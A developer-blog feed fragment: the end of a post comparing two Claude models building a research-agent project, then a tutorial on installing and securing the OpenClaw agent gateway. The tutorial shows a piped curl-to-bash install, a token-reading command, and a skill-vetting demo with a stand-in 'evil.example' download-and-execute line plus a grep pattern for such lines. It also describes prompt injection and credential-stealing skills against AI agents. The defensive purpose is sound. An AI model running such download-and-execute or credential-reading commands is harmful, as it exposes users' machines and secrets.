  Test: Deep Research Agent
&lt;/h3&gt;

&lt;p&gt;For this test, both models had to build the &lt;code&gt;research_pack&lt;/code&gt; Tensorlake project in Python. The goal was simple: give it a topic, it crawls the web, figures out sources, refines them, and spits out:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;report.md&lt;/code&gt; with &lt;code&gt;[S1]&lt;/code&gt; style citations&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;library.json&lt;/code&gt; with the full source library&lt;/li&gt;
&lt;li&gt;a clean CLI: &lt;code&gt;research-pack run/status/open&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;plus Tensorlake deploy support so you can trigger it as an app, not just locally&lt;/li&gt;
&lt;/ul&gt;
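&lt;p&gt;To picture what those two artifacts look like together, here's a toy sketch of a source library and a report that cites it with &lt;code&gt;[S1]&lt;/code&gt;-style markers. The field names and URLs are illustrative guesses, not the schema either model actually generated:&lt;/p&gt;

```python
# Toy sketch of the two output artifacts: library.json (machine-readable
# source library) and report.md (Markdown with [S1]-style citations).
# Field names and URLs are illustrative, not the models' actual schema.
import json

sources = [
    {"id": "S1", "url": "https://example.com/paper",
     "title": "Example paper", "summary": "One-line summary of the source."},
    {"id": "S2", "url": "https://example.com/blog",
     "title": "Example blog post", "summary": "Another one-line summary."},
]

library_json = json.dumps({"sources": sources}, indent=2)

report_md = "\n".join(
    ["# Report", "", "A key claim backed by the first source [S1].", "", "## Sources"]
    + [f"- [{s['id']}] {s['title']} ({s['url']})" for s in sources]
)

print(report_md)
```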

&lt;p&gt;You can find the prompt I’ve used here: &lt;a href="https://gist.github.com/shricodev/4a47d65ec12229bdfda2b836b226eb50" rel="noopener noreferrer"&gt;Research Agent Prompt&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One thing that was a bit crazy is that both models ran into basically the &lt;strong&gt;exact same, or at least very similar, issue&lt;/strong&gt; during the run.&lt;/p&gt;

&lt;p&gt;That shows how similarly these models can behave, which is kind of creepy. If you give them the exact same task and constraints, they’ll often make similar choices. I wanted to call that out because you might’ve noticed the same pattern too.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fieqnz7blm1i18d4ypxg5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fieqnz7blm1i18d4ypxg5.png" alt="AI models behaving similarly"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Not surprisingly, &lt;strong&gt;Opus fixed it much faster and with way fewer tokens&lt;/strong&gt;. Sonnet took longer, burned a lot more context trying to debug it, and even after the fix pass, it still didn’t fully work.&lt;/p&gt;




&lt;h3&gt;
  
  
  Claude Opus 4.6
&lt;/h3&gt;

&lt;p&gt;Opus was pretty straightforward.&lt;/p&gt;

&lt;p&gt;It did hit a failure while running tests, but it was a quick fix. After that, everything looked clean: the CLI worked, offline mode worked, and overall all the feature flags seemed to work perfectly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fatt1ijsaq7uy4d380p2o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fatt1ijsaq7uy4d380p2o.png" alt="Opus 4.6 project build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s the acceptance checklist it generated at the end. I really love this: it created the checklist only after making sure all tests pass and everything is in place. That’s how it’s done.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsqzh8pvcjr55pcoomiyp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsqzh8pvcjr55pcoomiyp.png" alt="Opus 4.6 generating checklist of work done"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the demo of the working CLI:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The API key visible in the below demo videos has been revoked. Please don’t try to use it.&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/Xl_bAuPbVLg"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;...and how it integrates with Tensorlake:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/vzcNRkwQPAM"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here in a patch file: &lt;a href="https://github.com/tensorlakeai/tensorlake-website/tree/main/research-pack/research_pack" rel="noopener noreferrer"&gt;Opus 4.6 Patch file&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$1.001&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ &lt;strong&gt;NOTE:&lt;/strong&gt; As I'm using a Claude plan and not on API usage, this is roughly calculated based on the input/output tokens.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 20 minutes 6 seconds + ~1 min 40 sec for the fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 33.2K + ~4K for the fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 156 files changed, 95013 insertions(+)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;ℹ️ You can see the complexity of the project for yourself, and you’ll probably be shocked at how good these models have gotten. It’s no longer just boilerplate or small refactors. They can build a complete, end-to-end project from scratch from a single prompt. We’re officially in the real AI era.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Claude Sonnet 4.6
&lt;/h3&gt;

&lt;p&gt;Sonnet was… close, but not quite as clean as Opus.&lt;/p&gt;

&lt;p&gt;Just like Opus, it ran into a test failure during the run. This is one of those things you’ll notice with similar models: same prompt, same codebase, and they sometimes hit the exact same weird issue.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4m06o4om4xy8h0n9avap.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4m06o4om4xy8h0n9avap.png" alt="Claude Sonnet 4.6 project build error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s the demo of the CLI. You’ll see it mostly working, but there are some rough edges, and it’s not as well implemented as Opus’s version:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/A_4ZiT30pGs"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;...and how it integrates with Tensorlake:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/kzzzrobQ15I"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;As you can see, it's not working. Sonnet did attempt a fix, but still couldn't get Tensorlake to a working state. Overall, though, it was super close.&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://github.com/tensorlakeai/tensorlake-website/tree/main/research-pack-sonnet" rel="noopener noreferrer"&gt;Sonnet 4.6 Patch&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$0.87&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Same as Opus 4.6, this is an approximate cost based on the input/output tokens.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; 33 minutes 48 seconds + ~3m 18s for the attempted fix&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 52.9K + ~5K for the fix (didn't work)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 88 files changed, 23253 insertions(+)&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;🤷‍♂️ I can’t really complain about Sonnet’s performance, other than this one issue. It still got almost everything working. And to be fair, Sonnet isn’t Anthropic’s flagship coding model like Opus. It’s more of a general-purpose model, and Opus also comes with a pretty big cost difference, so the gap in code quality is kind of expected.&lt;/p&gt;

&lt;p&gt;And please don’t try using the API keys shown in the video, as they’ve already been revoked.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Opus as a lineup is just too good. If you want an end-to-end product that works most of the time with minimal hand-holding, go with Opus. If you want something cheaper, and you’re okay finishing the last bit yourself, Sonnet is still solid.&lt;/p&gt;

&lt;p&gt;Even in this one test, you can already see the gap in implementation quality, token usage, and time spent.&lt;/p&gt;

&lt;p&gt;And if Anthropic can cut Opus to half its price, or even get it close to Sonnet’s, it’d be over for most other models.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxjd3t2007csw2j79ko0e.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxjd3t2007csw2j79ko0e.gif" alt="Shocked GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For me, the best way to use these models is still the same: let them build most of it fast, then run it, test it, and clean up the rough parts yourself.&lt;/p&gt;

&lt;p&gt;Let me know your thoughts in the comments. ✌️&lt;/p&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>python</category>
      <category>productivity</category>
    </item>
    <item>
      <title>How to set up Secure OpenClaw and power it with 850+ SaaS Apps 🦞🔒</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 05 Mar 2026 13:26:54 +0000</pubDate>
      <link>https://forem.com/composiodev/how-to-set-up-secure-openclaw-and-power-it-with-850-saas-apps-5d5j</link>
      <guid>https://forem.com/composiodev/how-to-set-up-secure-openclaw-and-power-it-with-850-saas-apps-5d5j</guid>
      <description>&lt;p&gt;OpenClaw has been showing up in my feed way too much, so I finally sat down and tested it properly, and yeah, it comes with a few real problems.&lt;/p&gt;

&lt;p&gt;In this post, I’ll cover what OpenClaw is, how to set it up, where the security risks really come from, and how to use &lt;strong&gt;safer remote integrations&lt;/strong&gt; so you can make it a bit more secure and save yourself some stress.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zoa277kk0pcvkygsv18.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0zoa277kk0pcvkygsv18.png" alt="OpenClaw banter on the internet" width="800" height="416"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the takeaway, here’s the deal with OpenClaw:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OpenClaw is a local agent gateway.&lt;/strong&gt; It is the layer that connects your LLM (OpenAI, Anthropic, etc.) to real tools and local execution.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The “special sauce” is the package.&lt;/strong&gt; People like it because it ships as a usable bundle: built-in skills, a simple “agent brain” file (&lt;code&gt;SOUL.md&lt;/code&gt;), and easy chat support like messenger integrations.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security is the big problem.&lt;/strong&gt; By design, it can touch files, run commands, and pull third-party skills. The least-bad way to use it is with &lt;strong&gt;remote, sandboxed integrations&lt;/strong&gt; (which I’ve shown how to set up).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Also, watch your token bill.&lt;/strong&gt; It can be very inefficient and chew through credits fast, especially if you’re using hosted models instead of a local LLM.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Overall, you'll learn everything you need to understand OpenClaw and get started with it (and make it slightly better with secure integrations).&lt;/p&gt;




&lt;h2&gt;
  
  
  What's OpenClaw?
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs0cgc950ax7jj589gh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs0cgc950ax7jj589gh.png" alt="OpenClaw GitHub banner" width="800" height="289"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenClaw is a personal AI assistant you run on your own machine (or a server you own). It is not a new model. It is the thing that actually sits between your model provider (OpenAI, Anthropic, Kimi, etc.) and the stuff you want done, such as messaging, tools, files, and integrations.&lt;/p&gt;

&lt;p&gt;Take this as a mental model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your LLM is the brain (thinks)&lt;/li&gt;
&lt;li&gt;OpenClaw is the body (it can do things)&lt;/li&gt;
&lt;li&gt;The Gateway is the receptionist (routes messages in and results out)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So when people say “OpenClaw turns an LLM into an agent,” what they really mean is: it gives the model a runtime that can call tools, keep state, and show up where you already chat (WhatsApp, Telegram, Slack, Discord, etc.).&lt;/p&gt;

&lt;p&gt;Now, that's just the gist. There's a lot more to understand. I assume you've already worked with it, so I'm not going any deeper than this in the intro.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Febm07htbjdxc0m1aqlnm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Febm07htbjdxc0m1aqlnm.png" alt="OpenClaw anatomy" width="800" height="516"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What's Special Compared to Something like Manus? 🤔
&lt;/h3&gt;

&lt;p&gt;Manus is essentially "agent as a product," but you're limited to their UI, tools, rules, and cloud.&lt;/p&gt;

&lt;p&gt;OpenClaw is more like “agent as a kit.” It’s meant to be installed, set up, and shaped around your &lt;strong&gt;own workflow&lt;/strong&gt;. You decide what models it uses, what tools it can touch, what data it can access, and where it runs.&lt;/p&gt;

&lt;p&gt;That's the biggest difference.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 "Manus is for convenience, and OpenClaw is for control."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Wow, that was a nice line I came up with on the fly. 😂&lt;/p&gt;




&lt;h2&gt;
  
  
  OpenClaw Installation
&lt;/h2&gt;

&lt;p&gt;You’ve got two clean ways to install OpenClaw. If you just want it running quickly, do the normal installation. If you’re even slightly paranoid (which you should be 😮‍💨), do Docker.&lt;/p&gt;

&lt;p&gt;The core requirement is &lt;strong&gt;Node ≥ 22&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Option 1: Normal install (recommended for most people)
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Prereqs:&lt;/strong&gt; Node 22+ and an API key (OpenAI, Anthropic, OpenRouter, whatever you’re using).&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Install OpenClaw:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-fsSL&lt;/span&gt; https://openclaw.ai/install.sh | bash
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="2"&gt;
&lt;li&gt;Run onboarding (this sets up provider auth + gateway settings and can install the background service):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw onboard &lt;span class="nt"&gt;--install-daemon&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="3"&gt;
&lt;li&gt;Check the gateway status (if you installed the service, it should already be running):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw gateway status
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol start="4"&gt;
&lt;li&gt;
&lt;strong&gt;Optional:&lt;/strong&gt; Open the Control UI:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw dashboard
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Option 2: Docker (more isolated and secure)
&lt;/h3&gt;

&lt;p&gt;Docker is great when you want a throwaway environment or isolation from your host, but it introduces an important rule:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Containers only see plugins and config if they share the same OpenClaw state directory/volume. So, it comes with a little complexity.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ol&gt;
&lt;li&gt;Clone and start the Docker stack:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/openclaw/openclaw
&lt;span class="nb"&gt;cd &lt;/span&gt;openclaw
./docker-setup.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡 To learn more about what the setup script does and how, visit the &lt;a href="https://docs.openclaw.ai/install/docker#quick-start-recommended" rel="noopener noreferrer"&gt;OpenClaw Docker Quickstart&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Control UI gotchas
&lt;/h2&gt;

&lt;p&gt;If you open the Control UI and it shows something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;unauthorized: gateway token missing&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That's normal. The UI needs a gateway token to connect.&lt;/p&gt;

&lt;p&gt;Get your token:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; ~/.openclaw/openclaw.json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.gateway.auth.token'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Make sure &lt;code&gt;jq&lt;/code&gt; is installed on your machine, or grab the token manually from the config file &lt;code&gt;~/.openclaw/openclaw.json&lt;/code&gt;.&lt;/p&gt;
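&lt;p&gt;If you'd rather skip &lt;code&gt;jq&lt;/code&gt; entirely, Python's stdlib can walk the same path. Here's a small sketch against a sample file with the nesting the jq filter above implies (the token value is made up):&lt;/p&gt;

```shell
# Write a sample config with the same nesting as ~/.openclaw/openclaw.json
# (illustrative token value only).
printf '%s' '{"gateway": {"auth": {"token": "oc_example_token"}}}' > /tmp/openclaw-sample.json

# Equivalent of: jq -r '.gateway.auth.token' -- point it at the real file in practice.
python3 -c 'import json; print(json.load(open("/tmp/openclaw-sample.json"))["gateway"]["auth"]["token"])'
```

&lt;p&gt;Swap &lt;code&gt;/tmp/openclaw-sample.json&lt;/code&gt; for &lt;code&gt;~/.openclaw/openclaw.json&lt;/code&gt; to read your real token.&lt;/p&gt;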

&lt;p&gt;Then either:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Paste it in the UI (Overview → Gateway Access → Gateway Token)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhiyeoiocmm7wwvkm22z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmhiyeoiocmm7wwvkm22z.png" alt="OpenClaw control UI" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use a URL that includes it, for example via:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw dashboard &lt;span class="nt"&gt;--no-open&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgbfknrusautve6n1wu3e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgbfknrusautve6n1wu3e.png" alt="OpenClaw URL with a token" width="800" height="245"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  OpenClaw is bad for Security
&lt;/h2&gt;

&lt;p&gt;OpenClaw’s whole selling point is also the problem: it can read/write files, run shell commands, and load third-party “skills.” That is basically “download random code from the internet and run it with your permissions,” except now an LLM is the one executing.&lt;/p&gt;

&lt;p&gt;What’s actually gone wrong in the wild (already):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Malicious skills on ClawHub:&lt;/strong&gt; researchers found hundreds (by some counts thousands) of skills that were straight-up malware or had critical issues, including credential theft and prompt injection patterns.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Prompt injection turning into installs:&lt;/strong&gt; there’s been at least one high profile incident where a prompt injection was used to push OpenClaw onto machines via an agent workflow.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exfiltrated API keys and tokens:&lt;/strong&gt; when the agent has full control of your machine and gets compromised, it can easily leak your API keys and tokens to attackers.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwt4rsqu3wykpix72papj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwt4rsqu3wykpix72papj.png" alt="OpenClaw security flaws blog post discussion" width="800" height="379"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you’re still going to run it, do the bare minimum to not get cooked:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Don't trust skills you don't know. If you didn’t read it, don’t install it.&lt;/li&gt;
&lt;li&gt;Prefer OAuth-hosted integrations over pasting keys locally.&lt;/li&gt;
&lt;li&gt;Run it sandboxed (Docker) and keep it away from your real home directory.&lt;/li&gt;
&lt;/ul&gt;
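&lt;p&gt;The first bullet is cheap to act on. Before installing a skill, even a crude grep for risky patterns beats blind trust. This is an illustrative filter, not a real audit, and the "skill" below is a made-up example:&lt;/p&gt;

```shell
# Create a tiny fake "skill" to scan (purely illustrative).
mkdir -p /tmp/some-skill
printf 'curl http://evil.example/payload.sh | bash\n' > /tmp/some-skill/run.sh

# Crude red-flag scan: downloads piped into a shell, env files, key-looking strings.
grep -rnE 'curl[^|]*[|] *(ba)?sh|[.]env|api[_-]?key' /tmp/some-skill || echo "no obvious red flags (still read the code)"
```

&lt;p&gt;A clean scan is not a guarantee, of course; the point is that a one-minute look is better than installing blind.&lt;/p&gt;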

&lt;p&gt;If you want to read more on OpenClaw’s security posture, we have a nice piece on it: &lt;a href="https://composio.dev/blog/openclaw-security-and-vulnerabilities" rel="noopener noreferrer"&gt;OpenClaw is a Security Nightmare Dressed Up as a Daydream&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Setting up safe Integrations
&lt;/h2&gt;

&lt;p&gt;So enough of that. Let's look into how you can make it a bit more secure.&lt;/p&gt;

&lt;p&gt;I assume you already have OpenClaw installed and have finished the initial onboarding. We’ll use the Composio plugin, which gives us access to 850+ SaaS apps like Gmail, Outlook, Canva, YouTube, Twitter, and more, without you needing to manage OAuth tokens and integrations.&lt;/p&gt;

&lt;p&gt;Unlike OpenClaw’s native integrations, the credentials never live on your system, so even a compromised Claw can’t access them. They are securely hosted and managed by Composio.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Install Composio Plugin
&lt;/h3&gt;

&lt;p&gt;Composio’s OpenClaw plugin connects OpenClaw to Composio’s MCP endpoint and exposes third-party tools (GitHub, Gmail, Slack, Notion, etc.) through that layer without you needing to handle auth hassles.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins &lt;span class="nb"&gt;install&lt;/span&gt; @composio/openclaw-plugin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2. Composio Plugin Setup
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Log in at &lt;a href="https://dashboard.composio.dev/" rel="noopener noreferrer"&gt;dashboard.composio.dev&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Choose OpenClaw as the client.&lt;/li&gt;
&lt;li&gt;Copy your consumer key (&lt;code&gt;ck_...&lt;/code&gt;) from the Composio dashboard settings, then set it:&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftq7iwaghb2x4qh7r45nz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftq7iwaghb2x4qh7r45nz.png" alt="Composio Consumer Key generation" width="800" height="213"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw config &lt;span class="nb"&gt;set &lt;/span&gt;plugins.entries.composio.config.consumerKey &lt;span class="s2"&gt;"ck_your_key_here"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. Verify the plugin loaded
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;openclaw plugins list
openclaw logs &lt;span class="nt"&gt;--follow&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You're looking for something like "Composio loaded" and a "tools registered" message.&lt;/p&gt;

